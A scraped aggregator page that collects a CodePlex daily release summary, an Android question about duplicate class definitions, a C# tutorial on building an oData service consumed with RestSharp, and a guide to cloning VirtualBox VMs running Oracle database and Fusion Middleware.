vob2mkv-1.0.3: This is a maintenance update of the VOB2MKV utility. The MKVMUX filter now describes the cluster locations using a separate SeekHead element at th...WPFValidators: WPFValidators 1.0 Beta: Primeira versão do componente ainda em Beta, pode ser utilizada em produção pois esta funcionando bem e as futuras alterações não sofreram muito im...WSDLGenerator: WSDLGenerator 0.0.06: - Added option to generate SharePoint compatible *disco.aspx file. - Changed commandline optionsWSP Listener: WSP Listener version 1.0.0.0: First version of the WSP Listener includes: Easy cop[y paste installation of WSP solutions Extended logging E-mail when installation is finish...Yet another pali text reader: Pali Text Reader App v1.1: new features/updates + search history is now a tab + format codes in dictionary + add/edit terms in the dictionary + pali keyboard inserts symbols...Most Popular ProjectsMetaSharpi4o - Indexed LINQResExBraintree Client LibraryGeek's LibrarySharepoint Feature ManagerConfiguration ManagementOragon Architecture SqlBuilderTerrain Independant Navigating Automaton v2.0WBFS ManagerMost Active ProjectsUmbraco CMSRawrSDS: Scientific DataSet library and toolsBlogEngine.NETjQuery Library for SharePoint Web ServicesFasterflect - A Fast and Simple Reflection APIFarseer Physics Enginepatterns & practices – Enterprise LibraryTeam FTW - Software ProjectIonics Isapi Rewrite Filter

    Read the article

  • Class Issue (The type XXX is already defined )

    - by Android Stack
    I have listview app exploring cities each row point to diffrent city , in each city activity include button when clicked open new activity which is infinite gallery contains pics of that city , i add infinite gallery to first city and work fine , when i want to add it to the second city , it gave me red mark error in the class as follow : 1- The type InfiniteGalleryAdapter is already defined. 2-The type InfiniteGallery is already defined. i tried to change class name with the same result ,i delete R.jave and eclipse rebuild it with same result also i uncheck the java builder from project properties ,get same red mark error. please any help and advice will be appreciated thanks My Code : public class SecondCity extends Activity { /** Called when the activity is first created. */ @Override public void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); Boolean customTitleSupported = requestWindowFeature(Window.FEATURE_CUSTOM_TITLE); // Set the layout to use setContentView(R.layout.main); if (customTitleSupported) { getWindow().setFeatureInt(Window.FEATURE_CUSTOM_TITLE,R.layout.custom_title); TextView tv = (TextView) findViewById(R.id.tv); Typeface face=Typeface.createFromAsset(getAssets(),"BFantezy.ttf"); tv.setTypeface(face); tv.setText("MY PICTURES"); } InfiniteGallery galleryOne = (InfiniteGallery) findViewById(R.id.galleryOne); galleryOne.setAdapter(new InfiniteGalleryAdapter(this)); } } class InfiniteGalleryAdapter extends BaseAdapter { **//red mark here (InfiniteGalleryAdapter)** private Context mContext; public InfiniteGalleryAdapter(Context c, int[] imageIds) { this.mContext = c; } public int getCount() { return Integer.MAX_VALUE; } public Object getItem(int position) { return position; } public long getItemId(int position) { return position; } private LayoutInflater inflater=null; public InfiniteGalleryAdapter(Context a) { this.mContext = a; inflater = (LayoutInflater)mContext.getSystemService ( Context.LAYOUT_INFLATER_SERVICE); } public class ViewHolder{ public TextView text; public ImageView image; } private int[] images = { R.drawable.pic_1, R.drawable.pic_2, R.drawable.pic_3, R.drawable.pic_4, R.drawable.pic_5 }; private String[] name = { "This is first picture (1) " , "This is second picture (2)", "This is third picture (3)", "This is fourth picture (4)", " This is fifth picture (5)", }; public View getView(int position, View convertView, ViewGroup parent) { ImageView i = getImageView(); int itemPos = (position % images.length); try { i.setImageResource(images[itemPos]); ((BitmapDrawable) i.getDrawable()). setAntiAlias (true); } catch (OutOfMemoryError e) { Log.e("InfiniteGalleryAdapter", "Out of memory creating imageview. Using empty view.", e); } View vi=convertView; ViewHolder holder; if(convertView==null){ vi = inflater.inflate(R.layout.gallery_items, null); holder=new ViewHolder(); holder.text=(TextView)vi.findViewById(R.id.textView1); holder.image=(ImageView)vi.findViewById(R.id.image); vi.setTag(holder); } else holder=(ViewHolder)vi.getTag(); holder.text.setText(name[itemPos]); final int stub_id=images[itemPos]; holder.image.setImageResource(stub_id); return vi; } private ImageView getImageView() { ImageView i = new ImageView(mContext); return i; } } class InfiniteGallery extends Gallery { **//red mark here (InfiniteGallery)** public InfiniteGallery(Context context) { super(context); init(); } public InfiniteGallery(Context context, AttributeSet attrs) { super(context, attrs); init(); } public InfiniteGallery(Context context, AttributeSet attrs, int defStyle) { super(context, attrs, defStyle); init(); } private void init(){ // These are just to make it look pretty setSpacing(25); setHorizontalFadingEdgeEnabled(false); } public void setResourceImages(int[] name){ setAdapter(new InfiniteGalleryAdapter(getContext(), name)); setSelection((getCount() / 2)); } }

    Read the article

  • CodePlex Daily Summary for Tuesday, November 15, 2011

    CodePlex Daily Summary for Tuesday, November 15, 2011Popular ReleasesTHE NVL Maker: The NVL Maker Ver 3.10: 3.10 ??? ???: ·????????? ·????????? ·???“TJS”?“??”“EXP”?????“???”,???????? ·???“????”???,???????@if~@elsif~@else~@endif????? ·TJS????????? ·???????????else?endif??? ??: ·???FantasyDR?????????Wizard.exe(?????:http://code.google.com/p/nvlmaker-wizard/) ·KAGConfigEx2.exe??(?????:http://kcddp.keyfc.net/bbs/viewthread.php?tid=1374&extra=page%3D1) ·??????????skin??? ????: ·mapbutton????EXP??(??macro_map.ks) ·??????????AnimPlayer.ks?system????(??????AnimPlayer.ks???macro.ks) ·??????????????,?????...CreateHandouts: Latest Version: Latest VersionSQL Monitor - tracking sql server activities: SQLMon 4.1 alpha2: 1. improved object search, escape special characters, support search histories, and remember search option. 2. allow user to set connection time out. 3. allow user to drag & drop sql text or file to editors.SCCM Client Actions Tool: SCCM Client Actions Tool v0.8: SCCM Client Actions Tool v0.8 is currently the latest version. It comes with following changes since last version: Added "Wake On LAN" action. WOL.EXE is now included. Added new action "Get all active advertisements" to list all machine based advertisements on remote computers. Added new action "Get all active user advertisements" to list all user based advertisements for logged on users on remote computers. Added config.ini setting "enablePingTest" to control whether ping test is ru...Windows Azure SDK for PHP: Windows Azure SDK for PHP v4.0.4: INSTALLATION Windows Azure SDK for PHP requires no special installation steps. Simply download the SDK, extract it to the folder you would like to keep it in, and add the library directory to your PHP include_path. INSTALLATION VIA PEAR Maarten Balliauw provides an unofficial PEAR channel via http://www.pearplex.net. Here's how to use it: New installation: pear channel-discover pear.pearplex.net pear install pearplex/PHPAzure Or if you've already installed PHPAzure before: pear upgrade p...QuickGraph, Graph Data Structures And Algorithms for .Net: 3.6.61116.0: Portable library build that allows to use QuickGraph in any .NET environment: .net 4.0, silverlight 4.0, WP7, Win8 Metro apps.Devpad: 4.7: Whats new for Devpad 4.7: New export to Rich Text New export to FlowDocument Minor Bug Fix's, improvements and speed upsWeapsy: 0.4.1 Alpha: Edit Text bug fixedDesktop Google Reader: 1.4.2: This release remove the like and the broadcast buttons as Google Reader stopped supporting them (no, we don't like this decission...) Additionally and to have at least a small plus: the login window now automaitcally logs you in if you stored username and passwort (no more extra click needed) Finally added WebKit .NET to the about window and removed Awesomium MD5-Hash: 5fccf25a2fb4fecc1dc77ebabc8d3897 SHA-Hash: d44ff788b123bd33596ad1a75f3b9fa74a862fdbFluent Validation for .NET: 3.2: Changes since 3.1: Fixed issue #7084 (NotEmptyValidator does not work with EntityCollection<T>) Fixed issue #7087 (AbstractValidator.Custom ignores RuleSets and always runs) Removed support for WP7 for now as it doesn't support co/contravariance without crashing.RDRemote: Remote Desktop remote configurator V 1.0.0: Remote Desktop remote configurator V 1.0.0Rawr: Rawr 4.2.7: This is the Downloadable WPF version of Rawr!For web-based version see http://elitistjerks.com/rawr.php You can find the version notes at: http://rawr.codeplex.com/wikipage?title=VersionNotes Rawr AddonWe now have a Rawr Official Addon for in-game exporting and importing of character data hosted on Curse. The Addon does not perform calculations like Rawr, it simply shows your exported Rawr data in wow tooltips and lets you export your character to Rawr (including bag and bank items) like Char...VidCoder: 1.2.2: Updated Handbrake core to svn 4344. Fixed the 6-channel discrete mixdown option not appearing for AAC encoders. Added handling for possible exceptions when copying to the clipboard, added retries and message when it fails. Fixed issue with audio bitrate UI not appearing sometimes when switching audio encoders. Added extra checks to protect against reported crashes. Added code to upgrade encoding profiles on old queued items.Media Companion: MC 3.422b Weekly: Ensure .NET 4.0 Full Framework is installed. (Available from http://www.microsoft.com/download/en/details.aspx?id=17718) Ensure the NFO ID fix is applied when transitioning from versions prior to 3.416b. (Details here) TV Show Resolutions... Made the TV Shows folder list sorted. Re-visibled 'Manually Add Path' in Root Folders. Sorted list to process during new tv episode search Rebuild Movies now processes thru folders alphabetically Fix for issue #208 - Display Missing Episodes is not popu...DotSpatial: DotSpatial Release Candidate 1 (1.0.823): Supports loading extensions using System.ComponentModel.Composition. DemoMap compiled as x86 so that GDAL runs on x64 machines. How to: Use an Assembly from the WebBe aware that your browser may add an identifier to downloaded files which results in "blocked" dll files. You can follow the following link to learn how to "Unblock" files. Right click on the zip file before unzipping, choose properties, go to the general tab and click the unblock button. http://msdn.microsoft.com/en-us/library...XPath Visualizer: XPathVisualizer v1.3 Latest: This is v1.3.0.6 of XpathVisualizer. This is an update release for v1.3. These workitems have been fixed since v1.3.0.5: 7429 7432 7427MSBuild Extension Pack: November 2011: Release Blog Post The MSBuild Extension Pack November 2011 release provides a collection of over 415 MSBuild tasks. A high level summary of what the tasks currently cover includes the following: System Items: Active Directory, Certificates, COM+, Console, Date and Time, Drives, Environment Variables, Event Logs, Files and Folders, FTP, GAC, Network, Performance Counters, Registry, Services, Sound Code: Assemblies, AsyncExec, CAB Files, Code Signing, DynamicExecute, File Detokenisation, GU...Extensions for Reactive Extensions (Rxx): Rxx 1.2: What's NewRelated Work Items Please read the latest release notes for details about what's new. Content SummaryRxx provides the following features. See the Documentation for details. Many IObservable<T> extension methods and IEnumerable<T> extension methods. Many useful types such as ViewModel, CommandSubject, ListSubject, DictionarySubject, ObservableDynamicObject, Either<TLeft, TRight>, Maybe<T> and others. Various interactive labs that illustrate the runtime behavior of the extensio...Facebook C# SDK: v5.3.2: This is a RTW release which adds new features and bug fixes to v5.2.1. Query/QueryAsync methods uses graph api instead of legacy rest api. removed dependency from Code Contracts enabled Task Parallel Support in .NET 4.0+ (experimental) added support for early preview for .NET 4.5 (binaries not distributed in codeplex nor nuget.org, will need to manually build from Facebook-Net45.sln) added additional method overloads for .NET 4.5 to support IProgress<T> for upload progress added ne...Delete Inactive TS Ports: List and delete the Inactive TS Ports: UPDATEAdded support for windows 2003 servers and removed some null reference errors when the registry key was not present List and delete the Inactive TS Ports - The InactiveTSPortList.EXE accepts command line arguments The InactiveTSPortList.Standalone.WithoutPrompt.exe runs as a standalone exe without the need for any command line arguments.New ProjectsAFNC: testArithmetics: arithmetics for silverlight use note pattern by time streamAzon.Library: A collection of extensions, static helpers, AOP attributes. More will added as the project will go on.Chat TextBlock Control: A windows phone 7.1 control Resemble those chat balloon textblocks in the SMS appDiamond Framework: Diamond Framework an Common framework for Diamond Group.DNN Social Helpers: DNN Social HelpersDragon: DragonEasy Video Cropper: A simple application to make cropping videos easy for anyone. - Automatically detects black lines - Uses FFMPEGFluent Resource Mapper: This project aims to develop a framework to assist the internationalization of software using the paradigm Convetion over Configuration.Fully Observable: This project is to create an improved set of observable collections. It provides notifications for when items inside the collection change as well as when the collection itself changes.grpcmnq: no summary at allMathTool: Math tool for silverlight we plan will heve three point .matrix .differential equation .equation of locusnopCommerce Buckaroo payment provider plugin: This is a payment provider plugin for the dutch payment provider BUCKAROO. This plugin is developed and tested for nopCommerce version 2+ Phoenix MVVM+C Framework: Phoenix MVVM+C Framework PowerLib: PowerLib extends system .net library.RDRemote: This utility allows to enable the Remote Desktop connections from a remote computer using WMI.Sencha Touch Mini Workflow Framework: A workflow framework for Sencha Touch mobile apps including automatic component management ShWP: helper library for Windows PhoneTimer, Cronômetro e Despertador: Projeto desenvolvido no curso de extensão de C# da UFSCar SorocabaUtilityLibrary.Ajax: AjaxUtilityLibrary.Email: emailUtilityLibrary.FormBase: UtilityLibrary.FormBaseUtilityLibrary.Http: UtilityLibrary for HttpWebRequestUtilityLibrary.Ormapping: ormappingVoiceModel: VoiceModel is a project which make it easier to develop VoiceXML applications using ASP.Net MVC with Razor. It uses the MVVM (Model-View-VoiceModel) design pattern to abstract the voice application to a higher level. It is developed in C# and Razor.WebSite.Request: WebSite.Request launch web request (via XMLHTTP) on website. Use, for example, to make initial request to sharepoint URL and escape "slow first request" problem.Where's my lei, man?: Where's my lei, man?Zombsquare: Aplicación de ejemplo para Windows Phone utilizada en el Windows Phone Roadshow realizado en España en 2011, en esta solución podras encontra ejemplos de: -Diseño en Blend -BingMaps -GeoLocalizacion -Realidad Aumentada -Converters -Mini-trivial -Serialización de objetos ... resistir un apocalipsis Zombie...

    Read the article

  • Restful Services, oData, and Rest Sharp

    - by jkrebsbach
    After a great presentation by Jason Sheehan at MDC about RestSharp, I decided to implement it. RestSharp is a .Net framework for consuming restful data sources via either Json or XML. My first step was to put together a Restful data source for RestSharp to consume.  Staying entirely withing .Net, I decided to use Microsoft's oData implementation, built on System.Data.Services.DataServices.  Natively, these support Json, or atom+pub xml.  (XML with a few bells and whistles added on) There are three main steps for creating an oData data source: 1)  override CreateDSPMetaData This is where the metadata data is returned.  The meta data defines the structure of the data to return.  The structure contains the relationships between data objects, along with what properties the objects expose.  The meta data can and should be somehow cached so that the structure is not rebuild with every data request. 2) override CreateDataSource The context contains the data the data source will publish.  This method is the conduit which will populate the metadata objects to be returned to the requestor. 3) implement static InitializeService At this point we can set up security, along with setting up properties of the web service (versioning, etc)   Here is a web service which publishes stock prices for various Products (stocks) in various Categories. namespace RestService {     public class RestServiceImpl : DSPDataService<DSPContext>     {         private static DSPContext _context;         private static DSPMetadata _metadata;         /// <summary>         /// Populate traversable data source         /// </summary>         /// <returns></returns>         protected override DSPContext CreateDataSource()         {             if (_context == null)             {                 _context = new DSPContext();                 Category utilities = new Category(0);                 utilities.Name = "Electric";                 Category financials = new Category(1);                 financials.Name = "Financial";                                 IList products = _context.GetResourceSetEntities("Products");                 Product electric = new Product(0, utilities);                 electric.Name = "ABC Electric";                 electric.Description = "Electric Utility";                 electric.Price = 3.5;                 products.Add(electric);                 Product water = new Product(1, utilities);                 water.Name = "XYZ Water";                 water.Description = "Water Utility";                 water.Price = 2.4;                 products.Add(water);                 Product banks = new Product(2, financials);                 banks.Name = "FatCat Bank";                 banks.Description = "A bank that's almost too big";                 banks.Price = 19.9; // This will never get to the client                 products.Add(banks);                 IList categories = _context.GetResourceSetEntities("Categories");                 categories.Add(utilities);                 categories.Add(financials);                 utilities.Products.Add(electric);                 utilities.Products.Add(electric);                 financials.Products.Add(banks);             }             return _context;         }         /// <summary>         /// Setup rules describing published data structure - relationships between data,         /// key field, other searchable fields, etc.         /// </summary>         /// <returns></returns>         protected override DSPMetadata CreateDSPMetadata()         {             if (_metadata == null)             {                 _metadata = new DSPMetadata("DemoService", "DataServiceProviderDemo");                 // Define entity type product                 ResourceType product = _metadata.AddEntityType(typeof(Product), "Product");                 _metadata.AddKeyProperty(product, "ProductID");                 // Only add properties we wish to share with end users                 _metadata.AddPrimitiveProperty(product, "Name");                 _metadata.AddPrimitiveProperty(product, "Description");                 EntityPropertyMappingAttribute att = new EntityPropertyMappingAttribute("Name",                     SyndicationItemProperty.Title, SyndicationTextContentKind.Plaintext, true);                 product.AddEntityPropertyMappingAttribute(att);                 att = new EntityPropertyMappingAttribute("Description",                     SyndicationItemProperty.Summary, SyndicationTextContentKind.Plaintext, true);                 product.AddEntityPropertyMappingAttribute(att);                 // Define products as a set of product entities                 ResourceSet products = _metadata.AddResourceSet("Products", product);                 // Define entity type category                 ResourceType category = _metadata.AddEntityType(typeof(Category), "Category");                 _metadata.AddKeyProperty(category, "CategoryID");                 _metadata.AddPrimitiveProperty(category, "Name");                 _metadata.AddPrimitiveProperty(category, "Description");                 // Define categories as a set of category entities                 ResourceSet categories = _metadata.AddResourceSet("Categories", category);                 att = new EntityPropertyMappingAttribute("Name",                     SyndicationItemProperty.Title, SyndicationTextContentKind.Plaintext, true);                 category.AddEntityPropertyMappingAttribute(att);                 att = new EntityPropertyMappingAttribute("Description",                     SyndicationItemProperty.Summary, SyndicationTextContentKind.Plaintext, true);                 category.AddEntityPropertyMappingAttribute(att);                 // A product has a category, a category has products                 _metadata.AddResourceReferenceProperty(product, "Category", categories);                 _metadata.AddResourceSetReferenceProperty(category, "Products", products);             }             return _metadata;         }         /// <summary>         /// Based on the requesting user, can set up permissions to Read, Write, etc.         /// </summary>         /// <param name="config"></param>         public static void InitializeService(DataServiceConfiguration config)         {             config.SetEntitySetAccessRule("*", EntitySetRights.All);             config.DataServiceBehavior.MaxProtocolVersion = DataServiceProtocolVersion.V2;             config.DataServiceBehavior.AcceptProjectionRequests = true;         }     } }     The objects prefixed with DSP come from the samples on the oData site: http://www.odata.org/developers The products and categories objects are POCO business objects with no special modifiers. Three main options are available for defining the MetaData of data sources in .Net: 1) Generate Entity Data model (Potentially directly from SQL Server database).  This requires the least amount of manual interaction, and uses the edmx WYSIWYG editor to generate a data model.  This can be directly tied to the SQL Server database and generated from the database if you want a data access layer tightly coupled with your database. 2) Object model decorations.  If you already have a POCO data layer, you can decorate your objects with properties to statically inform the compiler how the objects are related.  The disadvantage is there are now tags strewn about your business layer that need to be updated as the business rules change.  3) Programmatically construct metadata object.  This is the object illustrated above in CreateDSPMetaData.  This puts all relationship information into one central programmatic location.  Here business rules are constructed when the DSPMetaData response object is returned.   Once you have your service up and running, RestSharp is designed for XML / Json, along with the native Microsoft library.  There are currently some differences between how Jason made RestSharp expect XML with how atom+pub works, so I found better results currently with the Json implementation - modifying the RestSharp XML parser to make an atom+pub parser is fairly trivial though, so use what implementation works best for you. I put together a sample console app which calls the RestSvcImpl.svc service defined above (and assumes it to be running on port 2000).  I used both RestSharp as a client, and also the default Microsoft oData client tools. namespace RestConsole {     class Program     {         private static DataServiceContext _ctx;         private enum DemoType         {             Xml,             Json         }         static void Main(string[] args)         {             // Microsoft implementation             _ctx = new DataServiceContext(new System.Uri("http://localhost:2000/RestServiceImpl.svc"));             var msProducts = RunQuery<Product>("Products").ToList();             var msCategory = RunQuery<Category>("/Products(0)/Category").AsEnumerable().Single();             var msFilteredProducts = RunQuery<Product>("/Products?$filter=length(Name) ge 4").ToList();             // RestSharp implementation                          DemoType demoType = DemoType.Json;             var client = new RestClient("http://localhost:2000/RestServiceImpl.svc");             client.ClearHandlers(); // Remove all available handlers             // Set up handler depending on what situation dictates             if (demoType == DemoType.Json)                 client.AddHandler("application/json", new RestSharp.Deserializers.JsonDeserializer());             else if (demoType == DemoType.Xml)             {                 client.AddHandler("application/atom+xml", new RestSharp.Deserializers.XmlDeserializer());             }                          var request = new RestRequest();             if (demoType == DemoType.Json)                 request.RootElement = "d"; // service root element for json             else if (demoType == DemoType.Xml)             {                 request.XmlNamespace = "http://www.w3.org/2005/Atom";             }                              // Return all products             request.Resource = "/Products?$orderby=Name";             RestResponse<List<Product>> productsResp = client.Execute<List<Product>>(request);             List<Product> products = productsResp.Data;             // Find category for product with ProductID = 1             request.Resource = string.Format("/Products(1)/Category");             RestResponse<Category> categoryResp = client.Execute<Category>(request);             Category category = categoryResp.Data;             // Specialized queries             request.Resource = string.Format("/Products?$filter=ProductID eq {0}", 1);             RestResponse<Product> productResp = client.Execute<Product>(request);             Product product = productResp.Data;                          request.Resource = string.Format("/Products?$filter=Name eq '{0}'", "XYZ Water");             productResp = client.Execute<Product>(request);             product = productResp.Data;         }         private static IEnumerable<TElement> RunQuery<TElement>(string queryUri)         {             try             {                 return _ctx.Execute<TElement>(new Uri(queryUri, UriKind.Relative));             }             catch (Exception ex)             {                 throw ex;             }         }              } }   Feel free to step through the code a few times and to attach a debugger to the service as well to see how and where the context and metadata objects are constructed and returned.  Pay special attention to the response object being returned by the oData service - There are several properties of the RestRequest that can be used to help troubleshoot when the structure of the response is not exactly what would be expected.

    Read the article

  • Begin the Clone Wars Have!

    - by Antony Reynolds
    Creating a New Virtual Machine from an Existing Virtual Disk In previous posts I described how I set up an OEL6 machine under VirtualBox that can run an 11gR2 database and FMW 11.1.1.5.  That is great if you want the DB and FMW running in the same virtual image and it has served me well for some proof of concepts and also for some testing of different JVMs.  However I also wanted to run some testing of FMW with the database running on a separate physical machine.  So in this post I will show how to take a VirtualBox image and create a new image based on the disks from that original image. What are my Options? There is more than one way to skin a cat, or in this case to create two separate VMs that can run on different hardware.  Some of the options include: Create new virtual disk images for each new VM. Clone the existing disk images and point the new VM at the cloned images. Point the new VM at the existing snapshots. #1 is too much like hard work, install OEL twice, install a database again, install FMW again, run RCU again!  Life is too short! #2 is probably the safest way of doing things.  VirtualBox allows you to clone a disk image for use in a separate machine.  However this of course duplicates the disk and means that it is now occupying 3 times the space, once for the original disk and twice more for the two clones I would need. #3 is the most space efficient way of doing things.  It does mean however that I can only run the new “cloned” images if I have access to the original image because that is where the base snapshots reside.  However this is not a problem for me as long as I remember to keep all threee images together.  So this is the approach we will follow. Snapshot, What Snapshot? As we are going to create new virtual machines based on existing snapshots we need to figure out which snapshot to use.  We do this by opening the “Media Manager” from within VirtualBox and moving the mouse over the snapshot images until we find the snapshots we want – the snapshot name is identified in the “Attached to:” comment.  In my case I wanted the FMW installed snapshot because that had a database configured for FMW alongside the FMW software.  I made a note of the filename of that snapshot (actually I just noted the first 5 characters as that was all that was needed to uniquely identify the snapshot file). When we create the new machines we will point them at the snapshot filename we have just checked. Network or NotWork? Because we want the two new machines to communicate with each other when hosted in different physical machines we can’t use the default NAT networking mode without a lot of hassle.  But at the same time we need them to have fixed IP addresses relative to each other so that they can see each other whilst also being able to see the outside world. To achieve all these requirements I created two network adapters for each machine.  Adapter 1 was a standard NAT mapping.  This will allow each machine to get a dynamic IP address (10.0.2.15 by default) that can be used to access the external world through the VBox provided NAT gateway.  This is the same as the existing configuration. The second adapter I created as a bridged adapter.  This gives the virtual machine direct access to the host network card and by using fixed IP addresses each machine can see the other.  It is important to choose fixed IP addresses that are not routable across your internal network so you don’t get any clashes with other machines on your network.  Of course you could always get proper fixed IP addresses from your network people, but I have serveral people using my images and as long as I don’t have two instances of the same VM on the same network segment this is easier and avoids reconfiguring the network every time someone wants a copy of my VM.  If it is available I would suggest using the 10.0.3.* network as 10.0.2.* is the default NAT network.  You can check availability by pinging 10.0.3.1 and 10.0.3.2 from your host machine.  If it times out then you are probably safe to use that. Creating the New VMs Now that I had collected the data that I needed I went ahead and created the new VMs. When asked for a “Boot Hard Disk” I used the “Choose a virtual hard disk file…” link to find the snapshot I had previously selected and set that to be the existing hard disk.  I chose the previously existing SOA 11.1.1.5 install for both the new DB and FMW machines because that snapshot had the database with the RCU completed that I wanted for my DB machine and it had the SOA software installed which I wanted for my FMW machine. After the initial creation of the virtual machine go into the network setting section and enable a second adapter which will be bridged.  Make a note of the MAC addresses (the last four digits should be sufficient) of the two adapters so that you can later set the bridged adapter to use fixed IP and the NAT adapter to use DHCP. We are now ready to start the VMs and reconfigure Linux. Reconfiguring Linux Because I now have two new machines I need to change their network configuration.  In particular I need to change the hostname, update the hosts file and change the network settings. Changing the Hostname I renamed both hosts by running the hostname command as root: hostname vboxfmw.oracle.com I also edited the /etc/sysconfig file and set the correct hostname in there. HOSTNAME=vboxfmw.oracle.com Changing the Network Settings I needed to change the network configuration to give the bridged network a fixed IP address.  I first explicitly set the MAC addresses of the two adapters, because the order of the virtual adapters in the VirtualBox Manager is not necessarily the same as the order of the adapters in the guest OS.  So I went in to the System->Preferences->Network Connections screen and explicitly set the “Device MAC address” for the two adapters. Having correctly mapped the Linux adapters to the VirtualBox adapters I then set the Bridged adapter to use fixed IP addressing rather than DHCP.  There is no need for additional routing or default gateways because we expect the two machine to be on the same LAN segment. Updating the Hosts File Having renamed the machines and reconfigured the network I then updated the /etc/hosts file to refer to the new machine name add a new line to the hosts file to provide an additional IP address for my server (the new fixed IP address) add a new line for the fixed IP address of the other virtual machine 10.0.3.101      vboxdb.oracle.com       vboxdb  # Added by NetworkManager 10.0.2.15       vboxdb.oracle.com       vboxdb  # Added by NetworkManager 10.0.3.102      vboxfmw.oracle.com      vboxfmw # Added by NetworkManager 127.0.0.1       localhost.localdomain   localhost ::1     vboxdb.oracle.com       vboxdb  localhost6.localdomain6 localhost6 To make sure everything takes effect I restarted the server. Reconfiguring the Database on the DB Machine Because we changed the hostname the listener and the EM console no longer start so I need to modify the listener.ora to use the new hostname and I also need to rebuild the EM configuration because it also relies on the hostname. I edited the $ORACLE_HOME/network/admin/listener.ora and changed the listening address to the new hostname:       (ADDRESS = (PROTOCOL = TCP)(HOST = vboxdb.oracle.com)(PORT = 1521)) After changing the listener.ora I was able to start the listener using: lsnrctl start I also had to reconfigure the EM database control.  I first deconfigured it using the command: emca -deconfig dbcontrol db -repos drop This drops the repository and removes any existing registered dbcontrols. I then re-configured it using the following command: emca -config dbcontrol db -repos create This creates the EM repository and then configures and starts dbcontrol. Now my database machine is ready so I can close it down and take a snapshot. Disabling the Database on the FMW Machine I set up the database to start automatically by creating a service called “dbora”.  On the FMW machine I do not need the database running so I can prevent it auto-starting by running the following command: chkconfig –del dbora Note that because I am using a snapshot it is not a waste of disk space to have the DB installed but not used.  As long as I don’t run it, it won’t cost me anything. I can now close the FMW machine down and take a snapshot. Creating a New Domain The FMW machine is now ready to create a new domain.  When creating the domain I can point it at the second machine which is running the database.  I can potentially run these machines on two separate physical machines as long as I have the original virtual machine available to both of the physical machines. Gotchas in Snapshotting VirtualBox does not support the concept of linked machines in a network like some virtualization technologies so when creating a snapshot it is a good idea to shut both VMs down and then take a snapshot on both of them.  This is because we want to keep the database in sync with the middleware.  One way to make sure that this happens would be to place all the domain configuration files on the database server via an NFS share, this would mean that all we would need to snapshot would be the database machine because that would hold all the state and configuration. The Sky’s the Limit We have covered a simple case of having just two machines.  I have a more complicated configuration in which two machine run a RAC database off the same base OS image, and two more machines run a SOA cluster based on the same OS image.  Just remember what machine holds state and what are the consequences of taking a snapshot.

    Read the article

< Previous Page | 30 31 32 33 34 35 36 37  | Next Page >